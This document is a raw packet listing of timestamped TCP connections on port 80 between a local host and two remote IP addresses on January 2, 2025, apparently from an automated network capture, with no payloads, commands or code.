Jan 2, 2025 19:14:10.739270926 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739279985 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739291906 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739303112 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739320040 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739321947 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739331961 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739343882 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739346981 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739352942 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739361048 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739372969 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739384890 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739396095 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739397049 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739428997 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739448071 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739464998 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739497900 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739509106 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739518881 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739547014 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739573002 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739645958 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739659071 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739669085 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739679098 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739689112 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739700079 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739711046 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739722967 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739744902 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739779949 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739965916 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739978075 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739989042 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740000010 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740009069 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740014076 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740021944 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740039110 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740050077 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740061045 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740071058 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740075111 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740082979 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740093946 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740104914 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740115881 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740117073 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740127087 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740137100 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740139961 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740155935 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740178108 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740384102 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740447998 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740461111 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740472078 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740482092 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740504026 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740518093 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740530014 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740535975 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740540981 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.740559101 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.740591049 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.743985891 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744003057 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744014025 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744024992 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744035006 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744045973 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744056940 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744062901 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744067907 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744080067 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744090080 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744102001 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744112968 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744118929 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744126081 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744137049 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744148016 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744148970 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744173050 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744189978 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744246006 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744266987 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744299889 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744302034 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744313955 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744425058 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744472027 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744482994 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744494915 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744504929 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744515896 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744520903 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744529009 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744539976 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.744545937 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744569063 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.744586945 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.752289057 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.917520046 CET	49714	80	192.168.2.5	185.149.146.164
Jan 2, 2025 19:14:10.917838097 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:12.475706100 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:12.480501890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:12.480591059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:12.491224051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:12.495955944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.091254950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.091274977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.091347933 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.326118946 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.330950022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.503917933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.503988981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504024029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504056931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504087925 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.504090071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504102945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504116058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504127026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504132032 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.504142046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504153967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504180908 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.504230022 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.504611969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504625082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.504693985 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.589106083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.589119911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.589133024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.589179039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.590487003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.590547085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.590548992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.590559006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.590578079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.590590000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.590590000 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.590636969 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.591027021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591038942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591049910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591059923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591069937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591089010 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.591137886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.591881037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591892958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591903925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591914892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591926098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.591962099 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.591962099 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:13.592607021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:13.677278996 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.318819046 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.323667049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.509876013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.509897947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.509908915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.509989023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.510032892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.510093927 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.510111094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.510123968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.510133982 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.510147095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.510158062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.510188103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.510220051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.510992050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.511003971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.511019945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.511029959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.511042118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.511048079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.511071920 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.511071920 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.511132002 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.512003899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.512016058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.512027025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.512037039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.512048006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.512064934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.512087107 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.512087107 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.512121916 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.595081091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595097065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595108032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595170021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.595218897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595230103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595273018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.595304966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595324993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595340014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595350981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595350981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.595418930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.595691919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595735073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595763922 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.595963001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595974922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595985889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.595997095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596028090 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.596040964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.596415043 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596425056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596436024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596452951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596465111 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596474886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596484900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.596498966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.596498966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.596563101 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.597141027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597158909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597213030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.597322941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597340107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597351074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597359896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597371101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597382069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597387075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.597393990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597403049 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.597407103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.597476959 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.597476959 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.598292112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598303080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598314047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598325014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598335981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598345995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598346949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.598357916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598368883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.598376989 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.598406076 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.598453999 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.599231958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.599246025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.599256992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.599267960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.599297047 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.599320889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680037022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680073023 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680083990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680102110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680114031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680124998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680139065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680171013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680171013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680474997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680488110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680499077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680510044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680526018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680533886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680576086 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680656910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680704117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680722952 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680815935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680828094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680840015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.680860043 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.680877924 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.681694031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.681705952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.681716919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.681760073 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.681905985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.681920052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.681957960 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682009935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682022095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682034969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682045937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682080030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682080030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682324886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682373047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682384014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682385921 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682395935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682441950 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682472944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682485104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682496071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682509899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682512999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682529926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682554007 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682584047 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682809114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682826042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682837009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.682893991 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.682971954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683047056 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.683115959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683129072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683149099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683160067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683171034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683181047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683192968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683203936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683204889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.683204889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.683212042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683228016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.683248043 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.683971882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683984041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.683996916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.684007883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.684017897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.684029102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.684034109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.684041977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.684055090 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.684058905 CET	80	49721	147.45.44.131	192.168.2.5
